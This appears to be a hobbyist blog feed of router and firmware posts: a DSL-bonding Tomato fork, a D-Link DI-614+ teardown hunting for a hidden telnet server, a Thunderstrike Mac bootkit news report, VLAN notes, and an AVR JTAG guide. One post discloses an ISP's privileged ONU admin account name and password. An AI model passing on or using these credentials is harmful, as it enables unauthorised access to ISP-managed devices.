Showing posts sorted by relevance for query firmware. Sort by date Show all posts

Mar 12, 2013

How-To Bonding Tomato/MLPPP Router

Tomato/MLPPP is a fork of the popular Tomato firmware (http://www.polarcloud.com/tomato) for consumer broadband routers. The primary goal is to enable users to bond multiple DSL connections using MultiLink PPP (MLPPP), and/or to circumvent Bell Canada's DPI-based throttling by using MLPPP on a single DSL line.


This documentation will only cover differences between this fork and the original Tomato firmware. For information on things not covered here, please consult the Tomato website (linked above).

Obviously, your ISP must support MLPPP in order for this firmware to be of any use. Currently, TekSavvy (http://teksavvy.com), Velcom (http://www.velcom.ca), Acanac (http://www.acanac.ca), Caneris (http://www.caneris.com), LOGIX (http://www.logix.ca), and NetFlash (http://netflash.ca) are known to support MLPPP, while Electronic Box (http://www.electronicbox.net) is currently working on enabling MLPPP support. If your ISP supports MLPPP and you can confirm that you have it working, please contact us and we'll add it to this list.


This video shows how to (real) bond two DSL lines using Tomato/MLPPP on a Linksys router. Your ISP must support MLPPP (few do).

Attached to this post, you will find v1.19-mp1 of the firmware, as well as the source.

This firmware has only been tested on the WRT54GL v1.1, but should run on the following routers:

- Linksys WRT54G v1-v4, WRT54GS v1-v4, WRT54GL v1.x, WRTSL54GS (no USB support)
- Buffalo WHR-G54S, WHR-HP-G54, WZR-G54, WBR2-G54
- Asus WL500G Premium (no USB support)

Download Tomato/MLPPP firmware: tomato-mlppp-1.19-mp1.rar

Download Zeroshell/MLPPP firmware: zeroshell-mlppp-mz1alpha1.tar.bz2

Attached to this post you will find the first release of Tomato/MLPPP, a fork of the popular Tomato firmware for various consumer broadband routers. It allows you to bond two or more DSL lines to multiply your speed, and also circumvents Bell's throttling even if you only have one DSL line.

Mar 20, 2013

D-Link DI-614+ Hacking / Reverse Engineering


Very basic stuff, just playing with hardware/firmware; don't expect to be inspired.

This is just a small site I put together after taking apart my [worthless] DI-614+ (now discontinued). This router is a piece of junk. It still works, but it has to be reset almost every day and its wireless signal strength is SUPER BAD. So one day I decided to take it apart to see what I could do with it and how it looks inside, and here it is. This site is by no means the definitive location to get info on the 614+; there are other (probably better) sites. But this is just my own little project.


The main goal of this is to get shell access (from the current firmware release) or even run Linux on the 614+ if at all possible. This page was started by me, for me, and with little to no research on the subject of 614+ hacking (which later turned out to be a pretty extensive topic, mostly regurgitated info and no real-deal Linux-on-614+ info). If this is new to you, enjoy; if you've seen this before, please feel free to move on.


Note: This is Revision B. So what you see here is for the LAST DI-614+ (discontinued).

CPU Info:
Conexant
Network Processor
CX82100-41
E363335.1
0318 PHILIPPINES
ARM

Other Info:
OEM ID: GL2422RT-1T7
ARM9 Conexant CX82100-41 168 MHz
Global Sun Tech GL2422RT-1T8 v1.1
1MB FLASH (29LV800BTC-90)
8MB RAM (ICSI IC42S16400-7T)
Ethernet (Marvell 88E6060)
Wireless TI ACX100 mini-pci

There is a document online (here) that says that Revision A of the 614+ can be flashed with firmware from TrendWare (TEW-311BRP), Eusso (GL2422-RT) and PheeNet (WBIG-104b+) routers, which all originate from Global Sun Technologies in Taiwan. It also says there is currently no firmware for Revision B that can be substituted into the 614+. The main point I was looking for was confirmation that there is a telnet config mode, and there is. Now I guess it's my job to keep researching telnet config mode for RevB of the 614+. There has to be a way to enable this mode. If not, I'm going to CONSIDER flashing my 614+ with firmware from one of those routers, but with updated ARM9 processors (if those even exist).


Playing with the Firmware:

The firmware can be opened with WinRAR to extract "Nml.mem", which seems to be the main FlashROM data for the Conexant chip?? I'm still new at embedded hacking. But looking around inside the image file, there seems to be a lot of cool stuff that can be done with a little hex-editing! I'm so excited.


Now to figure out the file format of Nml.mem.... Extracting .GIF files is pretty easy though; finding the start and end of the files is pretty damn easy as they are stored one after the other (GIF89a, i.e. 0x47 0x49 0x46 0x38 0x39 0x61, signals the start of a GIF file and 0x00 0x3B seems to signal the end, if I recall). If you want to extract the files to modify them, just use a program that extracts file formats out of files (I forgot the name of an old DOS program I had that did this..). Anyway, here is an example of a GIF file extracted straight from Nlm.mem (which is inside the .bin):

Editing this while leaving the colors/size the same is very easy. Stuffing it back into Nlm.mem is yet untested......TO DO.

UPDATE:
I managed to extract all the GIFs and JPEGs stored in the firmware image (22 GIFs, 100 JPEGs). Now to extract the HTML and executables stored in Nlm.mem.
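As an added example (not the author's code), here is a Python carver for the GIF-extraction step above: it walks the GIF block structure to find the real end of each image instead of stopping at the first 00 3B, which can also occur inside image data. The Nlm.mem stand-in below is a constructed byte string, not data from the real firmware.

```python
import struct

GIF_MAGICS = (b"GIF89a", b"GIF87a")


def _color_table_bytes(packed):
    # Bit 7: colour table present; bits 0-2: table has 2^(n+1) entries of 3 bytes each
    return 3 * (2 << (packed & 0x07)) if packed & 0x80 else 0


def _skip_sub_blocks(buf, pos):
    # A chain of [size][size bytes of data] ... ended by a zero-length block
    while True:
        if pos >= len(buf):
            raise ValueError("truncated sub-block chain")
        size = buf[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size


def gif_length(buf, start):
    """Length of the GIF at buf[start], found by walking its block structure instead of
    searching for the bytes 00 3B, which may legitimately occur inside image data."""
    if buf[start:start + 6] not in GIF_MAGICS:
        raise ValueError("no GIF header")
    pos = start + 6
    if pos + 7 > len(buf):
        raise ValueError("truncated logical screen descriptor")
    pos += 7 + _color_table_bytes(buf[pos + 4])        # LSD + optional global colour table
    while True:
        if pos >= len(buf):
            raise ValueError("truncated GIF")
        tag = buf[pos]
        if tag == 0x3B:                                  # trailer
            return pos + 1 - start
        if tag == 0x21:                                  # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(buf, pos + 2)
        elif tag == 0x2C:                                # image descriptor (10 bytes)
            if pos + 10 > len(buf):
                raise ValueError("truncated image descriptor")
            pos += 10 + _color_table_bytes(buf[pos + 9])  # optional local colour table
            pos = _skip_sub_blocks(buf, pos + 1)         # LZW minimum code size, then data
        else:
            raise ValueError("unexpected block tag 0x%02x" % tag)


def carve_gifs(blob):
    """Return [(offset, gif_bytes)] for every well-formed GIF found in blob."""
    found, pos = [], 0
    while True:
        hits = [i for i in (blob.find(m, pos) for m in GIF_MAGICS) if i != -1]
        if not hits:
            return found
        start = min(hits)
        try:
            n = gif_length(blob, start)
        except ValueError:
            pos = start + 1          # false positive or damaged image: keep scanning
            continue
        found.append((start, blob[start:start + n]))
        pos = start + n


def carve_gifs_naive(blob):
    """The post's heuristic: header up to the first 00 3B. Kept only for comparison."""
    found, pos = [], 0
    while (start := blob.find(b"GIF89a", pos)) != -1:
        end = blob.find(b"\x00\x3b", start)
        if end == -1:
            return found
        found.append((start, blob[start:end + 2]))
        pos = end + 2
    return found


def _mini_gif(pixel_block):
    """Constructed 1x1 GIF89a with a 2-entry global colour table; pixel_block is the raw
    LZW sub-block payload (never decoded here, only skipped over)."""
    lsd = struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    gct = b"\x00\x00\x00\xff\xff\xff"
    img = b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    data = b"\x02" + bytes([len(pixel_block)]) + pixel_block + b"\x00"
    return b"GIF89a" + lsd + gct + img + data + b"\x3b"


# Constructed stand-in for Nlm.mem: two images between runs of filler. The second image's
# pixel data contains the bytes 00 3B, which cuts the naive end-of-file search short.
GIF_A = _mini_gif(b"\x44\x01")
GIF_B = _mini_gif(b"\x44\x00\x3b\x01")
FIRMWARE_SAMPLE = b"\x00" * 16 + GIF_A + b"ThreadX" + GIF_B + b"\xff" * 8

if __name__ == "__main__":
    for off, data in carve_gifs(FIRMWARE_SAMPLE):
        print("GIF at 0x%x, %d bytes" % (off, len(data)))
```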

Interesting strings inside the Firmware:

1) Looking for all the text-strings in "Nlm.mem" we find this:
WDB8WvbXdHtZyM8Ms2RENgHlacJghQyG
Previous experience with software protections and just lots of reading tells me that this looks like a hash. Could the password for the router be computed against this hash? I dunno. I would like to know though... Then to find a way to extract the encrypted hash out of the router memory... ugh.. never mind, what's the point?

Also inside that same file is this string: "dbgout.txt" I'd like to be able to access this and see what it has.

2) And now for the most useless stuff inside the Nlm.mem file:
Hey Moe, it dont woik. NYUK NYUK NYUK NYUK *bop* Owww!
YES, this was taken out of Nlm.mem! I have NO IDEA why it's there (crazy programmers). Or when it shows (possibly through a console error message).

3) Here is another interesting string:
This is a strange problem.
YES, this was taken straight out of Nlm.mem. Heh, just had to put it up here.

4) HELLO!!!%#@ Look what we have here:
GST Telnet server v1.0
!!! idle timeout (5 minutes) !!!
TELNET: bind error
TELNET: open socket fail
TELNET: setsockopt SO_REUSEADDR error
A little further down the file we see this:
Remote Managment Telnet Server
Looks like there IS a telnet server on this little sucker!!! I HAVE TO FIGURE THIS OUT!!

5) Here is some more interesting stuff. It looks like the MiniPCI card has a PRISM2 chipset (or not?), and ACX100TSK (on the chip it says AGX100AGHK) is the Texas Instruments wireless network chip (there's a project to write Linux drivers for the ACX100 chipset at http://acx100.sourceforge.net/, but I won't bother taking out the miniPCI card at the moment). Here is the FCC-ID page that has a ton of info on the ACX100 card, including pictures HERE (PDF file), and the manual here:
nInitializing Wireless Interface...OK !
Send WIRELESS_INIT_FAIL_TRAP
Initializing Wireless Interface...Failure !
Reinit WLAN driver (2) !
PRISM2_AP
Repeater disconnects with AP...
Start Easy backup mode.
802.11 Ad Hoc starts. BSSID = %02x:%02x:%02x:%02x:%02x:%02x
AP Client disconnects with AP.
Start Complex backup mode.
restore apclient timer
ACX100TSK
Michael error : Stop.
Check 22m rates
Repeater connects with AP. BSSID = %02x:%02x:%02x:%02x:%02x:%02x
AP Client connects with AP. BSSID = %02x:%02x:%02x:%02x:%02x:%02x
802.11 Ad Hoc connects with other. BSSID = %02x:%02x:%02x:%02x:%02x:%02x Channel:%d
AP is swapped by backup AP
Repeater disconnects with AP.
AP Client disconnects with AP.
Repeater disconnects with AP.
AP Client disconnects with AP.
ping complete
Memory Block Free Error!
Reinit WLAN driver (4) !
Reinit WLAN driver (5) !
Reinit WLAN driver (1) !
Reinit WLAN driver (3) !
.hteCPU did not start after boot from flash
Failed to download firmware to the ACX100
Timeout waiting for the ACX100 to complete Initialization
Here is some info gathered from the FCC website about the mini-PCI card in MY DI-614+:
  • Product Name: Wireless 22Mbps Mini PCI Card
  • Model Name: GL2422MP-MT FCC ID: KA2ACX100
6) Here we see that this little sucker runs the ThreadX RTOS:
Copyright (c) 1996-2000 Express Logic Inc. * ThreadX ARM7/Green Hills Version G3.0f.3.0c
OK, the 614+ seems to run Express Logic's ThreadX real-time operating system (www.expresslogic.com) on an ARM9 (www.arm.com) processor (the RevB has an ARM9, but this build looks like it is backwards compatible with the ARM7 specs??). From a little research it looks like Green Hills Software Inc. (www.ghs.com) licensed ThreadX from Express Logic, or I could be wrong..

Final outlook: After looking through Nlm.mem I am 100% sure there HAS to be a way to enable DEBUG MODE/REMOTE TELNET SERVER. Whether it's possible by some debugging/hex editing or something, I don't know. But there are just too many clues to have it any other way. I wish I had an ARM debugger....

This page (http://www.dlink.pl/presse/artikel_detail.asp?docid=DLPI020902) mentions "Web-based and Telnet configuration" on the 614+. I'd like to know how to enable telnet configuration...

Mar 21, 2013

CD-R King CW-5356U Tomato Firmware

I cobbled together a network-attached storage (NAS) at home to enable everyone in our house to have a shared directory for school, work and personal files. This shared directory is also accessible from outside the house – like a rudimentary personal “cloud” for our family.


It wasn’t complicated — you can go to my blog for the article on the process — because the setup was a matter of connecting an old portable USB drive to a cheap CD-R King wireless router and setting things up using a visual interface.

The magic sauce in the setup is the Tomato firmware that runs on the router. Tomato is a Linux-based router firmware that lets you manage such things as filtering and quality-of-service rules for certain types of connections, so that people browsing websites don't experience a crawling connection when someone is downloading via torrent.

The Tomato firmware that comes with the CD-R King router that I use, a CW-5356U model, simplifies the setting up of a NAS by allowing you to plug a portable drive into the router’s USB port. You can set the system to auto-mount any drive that you plug into it and make it shareable in your network. You can also designate a password for your shared drive so that not everyone who connects to your Wi-Fi can access it.

The system also assists you in setting up an FTP (file transfer protocol) server that will allow you to access that drive outside of your network. You can, with the setup, access your home files from the office or even on the go.

Promise of open source

What’s even more fun is that you can view movies stored on your portable drive over your iPhone or iPad.

The router also has a facility that will allow you to connect a printer to its USB port to turn it into a network printer. It also allows you to set up complex rules that can, for example, bar your children from accessing Facebook during class days but allow you to continue using the social network.

For just P1,280, the wireless router trumps the features of branded and more expensive models.

I think the CD-R King router illustrates the promise of open source software.

Tomato firmware is open source, meaning it is released under a license that encourages sharing the software and collaborating to make it better. Any wireless router manufacturer can use the Tomato firmware for its product. By using Tomato, the manufacturer no longer has to spend to develop and maintain its own firmware. Instead, it can just concentrate on the manufacturing side of the business.

By using Tomato, CD-R King is able to manufacture a router that’s really top-class for such a low price.

But if there’s an open source project that’s really making such a huge impact, it’s Android. There are phones in the market today that are powerful and advanced and yet cost less than P10,000. Cherry Mobile’s Flare, for example, costs just P3,999 but comes with formidable specs: Android ICS, 1.2 Ghz dual-core processor, five-megapixel camera and dual-SIM capability. It was such a hot item during the holidays that stocks were wiped out.

Jan 17, 2015

Macs undetectable virus that "can't be removed"

A security researcher has discovered a way to infect Macs with malware that is virtually undetectable and 'can't be removed.'

The attack, which has been called Thunderstrike, installs the malicious code into the Boot ROM of the system via the Thunderbolt port.


Trammell Hudson, who works for hedge fund Two Sigma Investments and is also the creator of the Magic Lantern open-source programming environment for Canon DSLRs, discovered the vulnerability after his employer asked him to look into the security of Apple notebooks.

"A few years ago we were considering deploying MacBooks and I was asked to use my reverse engineering experience to look into the reports of rootkits on the Mac to see if it was possible to patch the firmware to be secure against them," wrote Hudson in a summary of the vulnerability.

After initially discovering that the Boot ROM could be tampered with if the notebook was physically dismantled to give access to the chip soldered onto the motherboard, he then refined this technique so the attack could be carried out via the system's Thunderbolt port.

"It turns out that the Thunderbolt port gives us a way to get code running when the system boots," wrote Hudson. "Thunderbolt brings the PCIe bus to the outside world and at boot time the EFI firmware asks attached devices if they have any Option ROMs to be run."

Hudson discovered that he could use a modified Apple gigabit Ethernet Thunderbolt adapter to carry out the attack.

"Since it is the first OS X firmware bootkit, there is nothing currently scanning for its presence. It controls the system from the very first instruction, which allows it to log keystrokes, including disk encryption keys, place backdoors into the OS X kernel and bypass firmware passwords," Hudson said.

And once it is on your system, it is incredibly hard to remove.

"It can't be removed by software since it controls the signing keys and update routines. Reinstallation of OS X won't remove it. Replacing the SSD won't remove it since there is nothing stored on the drive."


"The classic 'evil-maid' attacks also are feasible. Given a few minutes alone with your laptop, Thunderstrike allows the boot ROM firmware to be replaced, regardless of firmware passwords or disk encryption," explains Hudson. "So while you are getting breakfast at the hotel during a conference and leave the machine in your room and house-cleaning comes by to make up the bed, install the firmware backdoors, and replace the towels."

According to Hudson, Thunderstrike "is effective against every MacBook Pro/Air/Retina with Thunderbolt."

Fortunately, Hudson reports that Apple is working on an update that will prevent malicious code from being written to the Boot ROM via the Thunderbolt port. However, this update would not protect the system from having the Boot ROM tampered with directly.

One defense against this would be to paint over the case screws with glitter nail polish and take close-up photos of the seal you created. The glitter in the nail polish sets into a random pattern that would be impossible to replicate, and as long as you keep the photos safe, you can make sure the screws haven't been messed with.

via www.zdnet.com

Jun 14, 2019

PLDT Fiberhome ONU AN5506-04-FA RP2627 Update Failed

Just last month I was reading kbeflo's gist on GitHub again, where so many netizens were shouting about their PLDT Fiberhome AN5506-04-FA/T ONU being remotely updated by the country's giant telco ISP. It was me who first disclosed on this blog the PLDT "fiberhomesuperadmin" account with privileged access to the PLDT Fibr ONU Super Admin, and later on TipidPC.com gave the password sfuhgu, so that everybody enjoyed tweaking and manipulating their own ONU device. Now sadness and sorrow have come again to all PLDT Fibr subscribers because of the so-called firmware update from RP2627 to RP2631, which gives another headache. I know that for a Shifu out there like you it won't be hard to locate the script even without web developer tools, but for a newbie like me it will be painful looking for the code.


I had been enjoying my PLDT Fiberhome ONU AN5506-04-FA RP2627 without any patches, still intact, until today at 6pm my little princess complained that her mini iPad was not working anymore, and I noticed that the internet connection was interrupted. There was no sign of the red LEDs turning on on the PLDT ONU, so I logged in to see whether the WAN connection had really gone down. On the Status main menu my PLDT ONU AN5506-04-FA was still intact and NOT updated to RP2631, but when I checked my Broadband settings, my ONU WAN type had been changed from INTERNET to TR069_INTERNET. My ONU VLAN ID is still the same, 1030, and the priority is still 0, but my WAN connection type can no longer be switched from Route mode to Bridge mode. What the F*ck, go and eat your PLDT Fiberhome ONU device. Yeah, you are right! Now you have glued it in the web user interface; do you think it won't be possible on the CLI? And what about the web developer tools, it can be unhidden. PITY on your graphical interface.


This is another disaster for PLDT Fibr subscribers who own this kind of ONU, the Fiberhome AN5506-04-FA/T. On kbeflo's gist thread on GitHub someone is already asking for the RP2627 firmware; I don't know if they will be able to upload the firmware onto the ONU device if they have it in hand. On this blog someone also commented and asked me for the RP2627 firmware; I can upload it for them, as I have the list of AN5506-04-FA firmware from RP2610 to RP2627. I have written on this blog that the best and easiest way to back up the AN5506-04-FA firmware on a Windows machine is via WinSCP: you can just click and drag the files.


I will leave it as it is today until the PLDT engineering technical team has finished their patches and remote firmware updates to all PLDT Fiberhome ONU devices; a post on how to undo the PLDT Fiberhome ONU AN5506-04-FA/T from RP2631 back to RP2627 will follow soon. I know it really hurts when you are in love with your ONU device firmware RP2627 and suddenly someone just takes it away without any prior notice. If possible I will write a tutorial on how to update the AN5506-04-FA/T firmware from RP2627 to RP2631, or vice versa from RP2631 to RP2627.

May 28, 2013

Exploring D-Link DIR-320 networks with Oleg's firmware or what are vlan0, vlan1, eth0, eth1, br0?

What is the device?

It's a D-Link wireless router (4MB flash, 32MB RAM and a 240 MHz Broadcom processor) with almost the same configuration as the ASUS WL500g Premium (8MB flash, 32MB RAM and a 266 MHz Broadcom processor), but it costs much less.


Why do I need this wireless router?

Because I want to build a wireless home network with an Internet connection (PPPoE) for a laptop, a netbook (HP 2133) and a telephone (Nokia E63) that supports Wi-Fi. I need the USB port for printing, and in the future for scanning, USB hard disks, a networked web camera, 3G or WiM modems, etc.

What is the Oleg's firmware?

It's a Linux-based custom firmware for the ASUS WL-500gx/WL-550gE/WL-500gp/WL-500W/WL-320gE/WL-320gP/WL-330gE/WL-500gp V2/WL-520gU. There isn't much you can do with the manufacturer's firmware. Instructions for installing (flashing) Oleg's firmware on the DIR-320 can be found in my blog (in English) or on wl500g.info (in Russian).

What are there inside the router with Oleg's firmware?

After flashing the device with Oleg's firmware, you can configure the Internet connection, wireless, etc. via the web browser interface. Don't forget to turn on the SSH server (dropbear). After that, log in and explore:

$ ifconfig
br0 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1122700 errors:0 dropped:0 overruns:0 frame:0
TX packets:1113191 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:367622803 (350.5 MiB) TX bytes:586264798 (559.1 MiB)

eth0 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1393411 errors:0 dropped:0 overruns:0 frame:0
TX packets:1113648 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:935119976 (891.7 MiB) TX bytes:655661617 (625.2 MiB)
Interrupt:4 Base address:0x1000

eth1 Link encap:Ethernet HWaddr 00:90:4C:C1:00:00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:619887 errors:0 dropped:0 overruns:0 frame:19671
TX packets:683607 errors:122 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:44888939 (42.8 MiB) TX bytes:305171776 (291.0 MiB)
Interrupt:13 Base address:0x5000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MULTICAST MTU:16436 Metric:1
RX packets:40152 errors:0 dropped:0 overruns:0 frame:0
TX packets:40152 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3718052 (3.5 MiB) TX bytes:3718052 (3.5 MiB)

ppp0 Link encap:Point-to-Point Protocol
inet addr:93.88.141.40 P-t-P:93.88.128.253 Mask:255.255.255.255
UP POINTOPOINT RUNNING MULTICAST MTU:1492 Metric:1
RX packets:647631 errors:0 dropped:0 overruns:0 frame:0
TX packets:661658 errors:0 dropped:44 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:545701887 (520.4 MiB) TX bytes:346044024 (330.0 MiB)

vlan0 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:504058 errors:0 dropped:0 overruns:0 frame:0
TX packets:443975 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:334078103 (318.6 MiB) TX bytes:292107592 (278.5 MiB)

vlan1 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00
inet addr:10.13.5.65 Bcast:10.13.5.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:889353 errors:0 dropped:0 overruns:0 frame:0
TX packets:669673 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:575960475 (549.2 MiB) TX bytes:363554025 (346.7 MiB)

Physically the D-Link DIR-320 wireless router has a 2-port router and a 6-port switch. One port of the switch is connected to the router, another one is the WAN port. The other 4 ports of the switch are the LAN ports on the back of the DIR-320. The remaining port of the router is connected to the WLAN adapter.

Inside the switch there are two virtual LANs (VLANs), vlan0 and vlan1. vlan0 contains the 4 LAN ports (ports 1--4) and one router port (port 6). vlan1 contains the WAN port (port 0, labelled "Internet Port" on the back) and the router port (port 6).

There is a bridge (br0) bridging eth1 (WLAN) and eth0 (switch port 0). This bridge lets WLAN and LAN share the same IP address. When the router needs to send information to clients, it broadcasts out br0 (to eth1 and vlan0). When it needs to send information to the Internet (WAN), the router sends directly to vlan1.

$ brctl showmacs br0
port no mac addr is local? ageing timer
2 00:1b:9e:7f:96:38 no 0.77
2 00:21:00:62:c1:86 no 0.00
2 00:23:b4:ce:cd:4e no 36.52
1 00:90:4c:c0:00:00 yes 0.00
2 00:90:4c:c1:00:00 yes 0.00
2 02:90:4c:c1:00:00 no 29.23
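Added example (not from the original post): a small Python parser for the ifconfig and brctl showmacs output above. It groups interfaces by MAC (showing why eth0, vlan0, vlan1 and br0 all report one address), flags which interfaces hold a public address or show link errors, and maps bridge ports to their members. The sample input is the post's own listing, trimmed to the lines the parser reads.

```python
import ipaddress
import re

# Sample input: the post's ifconfig / brctl listings, trimmed to the lines used here.
IFCONFIG_SAMPLE = """\
br0 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1122700 errors:0 dropped:0 overruns:0 frame:0
TX packets:1113191 errors:0 dropped:0 overruns:0 carrier:0

eth0 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00
RX packets:1393411 errors:0 dropped:0 overruns:0 frame:0
TX packets:1113648 errors:0 dropped:0 overruns:0 carrier:0

eth1 Link encap:Ethernet HWaddr 00:90:4C:C1:00:00
RX packets:619887 errors:0 dropped:0 overruns:0 frame:19671
TX packets:683607 errors:122 dropped:0 overruns:0 carrier:0

ppp0 Link encap:Point-to-Point Protocol
inet addr:93.88.141.40 P-t-P:93.88.128.253 Mask:255.255.255.255
RX packets:647631 errors:0 dropped:0 overruns:0 frame:0
TX packets:661658 errors:0 dropped:44 overruns:0 carrier:0

vlan0 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00
RX packets:504058 errors:0 dropped:0 overruns:0 frame:0
TX packets:443975 errors:0 dropped:0 overruns:0 carrier:0

vlan1 Link encap:Ethernet HWaddr 00:90:4C:C0:00:00
inet addr:10.13.5.65 Bcast:10.13.5.255 Mask:255.255.255.0
RX packets:889353 errors:0 dropped:0 overruns:0 frame:0
TX packets:669673 errors:0 dropped:0 overruns:0 carrier:0
"""

BRCTL_SAMPLE = """\
port no mac addr is local? ageing timer
2 00:1b:9e:7f:96:38 no 0.77
2 00:21:00:62:c1:86 no 0.00
2 00:23:b4:ce:cd:4e no 36.52
1 00:90:4c:c0:00:00 yes 0.00
2 00:90:4c:c1:00:00 yes 0.00
2 02:90:4c:c1:00:00 no 29.23
"""

_LINK_RE = re.compile(r"^(\S+)\s+Link encap:(.+?)(?:\s+HWaddr\s+(\S+))?$")
_STATS_RE = re.compile(r"^(RX|TX) packets:\d+ errors:(\d+) dropped:(\d+) overruns:(\d+) "
                       r"(?:frame|carrier):(\d+)")


def parse_ifconfig(text):
    """Parse BusyBox-style ifconfig output into {name: {hwaddr, inet, rx_bad, tx_bad}}.
    rx_bad/tx_bad sum errors + dropped + overruns + frame/carrier for that direction."""
    ifaces, cur = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = _LINK_RE.match(line)
        if m:
            cur = {"hwaddr": (m.group(3) or "").lower(), "inet": None, "rx_bad": 0, "tx_bad": 0}
            ifaces[m.group(1)] = cur
        elif cur is None:
            continue
        elif line.startswith("inet addr:"):
            cur["inet"] = line.split()[1].split(":", 1)[1]
        elif _STATS_RE.match(line):
            m = _STATS_RE.match(line)
            cur[m.group(1).lower() + "_bad"] = sum(int(x) for x in m.groups()[1:])
    return ifaces


def shared_mac_groups(ifaces):
    """Interfaces sharing one MAC: vlan0/vlan1 are 802.1Q children of eth0 and br0 takes
    a member's MAC, so the post's four 00:90:4c:c0:00:00 entries are one physical port."""
    groups = {}
    for name, i in ifaces.items():
        if i["hwaddr"]:
            groups.setdefault(i["hwaddr"], []).append(name)
    return {mac: sorted(names) for mac, names in groups.items()}


def externally_addressed(ifaces):
    """Interfaces holding a non-private address, i.e. reachable from the Internet (ppp0 here;
    vlan1's 10.x address sits on the ISP access network, not on the public Internet)."""
    return sorted(n for n, i in ifaces.items()
                  if i["inet"] and not ipaddress.ip_address(i["inet"]).is_private)


def noisy_links(ifaces):
    """Interfaces with any RX/TX errors or drops; on the post's box that is the wireless
    eth1 and the PPPoE link, the two that cross an untrusted medium."""
    return sorted(n for n, i in ifaces.items() if i["rx_bad"] or i["tx_bad"])


def bridge_ports(brctl_text, ifaces):
    """From brctl showmacs: port -> candidate member interfaces (matched on the 'yes' local
    MAC) and port -> MACs learned from other stations. Port 1 matches eth0/vlan0/vlan1
    because they share a MAC; the post states the actual member is vlan0."""
    members, learned = {}, {}
    for line in brctl_text.splitlines()[1:]:
        port, mac, local, _age = line.split()
        if local == "yes":
            members[int(port)] = sorted(n for n, i in ifaces.items()
                                        if i["hwaddr"] == mac and n != "br0")
        else:
            learned.setdefault(int(port), []).append(mac)
    return members, learned
```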

Via phanvinhthinh

Apr 12, 2013

AVR JTAG Debugger/Programmer

AVR JTAG: Credit to IsoJtagIsp for the schematic and bootloader. I modified the IsoJtagIsp schematic by removing the USB interface, because I want to use the AVR JTAG with a USB-to-RS232 adapter or a serial port.


Download the bootloader onto the ATMEGA16. If you don't have an AVR programmer I recommend the simple programmer from PonyProg, because it needs only a few components to build. If you already have an AVR programmer you can use it to download the bootloader. If you're using PonyProg the fuses should look like this.
  • IsoJtagISP_1.5_3.6864MHz.hex
  • IsoJtagISP_1.5_7.3728MHz.hex
  • IsoJtagISP_1.5_8.0MHz.hex
  • IsoJtagISP_source.rar

Once the bootloader is programmed, the next step is to upgrade the JTAGICE firmware on the ATMEGA16 using AVR Studio.

1.] Set the jumper to JTAG mode and power the board; the Power LED should come on and the Act LED should blink.

2.] Open AVR Studio, select the Tools menu and select AVR Prog. AVR Prog connected to the AVR JTAG looks like this:
AVR JTAG firmware upgrade.

3.] Click the Browse button and choose the AVR JTAGICE firmware for the upgrade, e.g. C:\MCU\Atmel\AVR Tools\JTAGICE\Upgrade.ebn

4.] Click the Program button and wait until the upgrade completes.

5.] Reset the board by pressing the reset button and wait until the Act LED stops blinking.

6.] Return to AVR Studio and select Tools menu->Program AVR->Connect. If the firmware upgrade completed, you will see the JTAG ICE dialog, which looks like this.

7.] Test the AVR JTAG with an ATMEGA32. Pin connections between the AVR JTAG and the MEGA32:
  • TCK_SCK -> TCK
  • TDO_MISO -> TDO
  • TMS_RST -> TMS
  • TDI_MOSI -> TDI

This is a simple source code for testing JTAG. If you don't have a compiler you can download WinAVR from winavr.sourceforge.net; it's a free compiler. After WinAVR is installed, create a new project in AVR Studio by selecting Project menu->New project; you will see the Create new project dialog. Select AVR GCC in Project type, fill the project name you want into the Project name box, fill "main" into the initial file box, finally click the Finish button and put this code into main.c.
/***********************************************************************
*
* File : main.c
* Desc : Blink LED on PB0
* Compiler : AVR GCC
* Author : Jirawat Kongkaen
* Website : .
*
***********************************************************************/

#include <avr/io.h>      /* DDRB, PORTB, PB0 and _BV() */

void delay(unsigned int count);

int main(void)
{
    DDRB = 0xFF;             /* Port B as output */

    for(;;)
    {
        PORTB |= _BV(PB0);     /* LED on */
        //delay(50000);
        PORTB &= ~(_BV(PB0));  /* LED off */
        //delay(50000);
    }

    return 0;
}

/* Busy-wait loop; volatile keeps the compiler from optimising it away */
void delay(unsigned int count)
{
    volatile unsigned int n = count;
    while(n) n--;
}
Before starting to debug you have to compile main.c first by selecting Build->Build or pressing F7. Now start debugging by selecting Debug menu->Start Debugging or clicking the Start Debugging button, which looks like this.


The connection between the AVR JTAG and the ATMEGA32 is established (see the figure below). Now start debugging by clicking the Step Into button or pressing F11; the LED at PB0 will turn on/off.


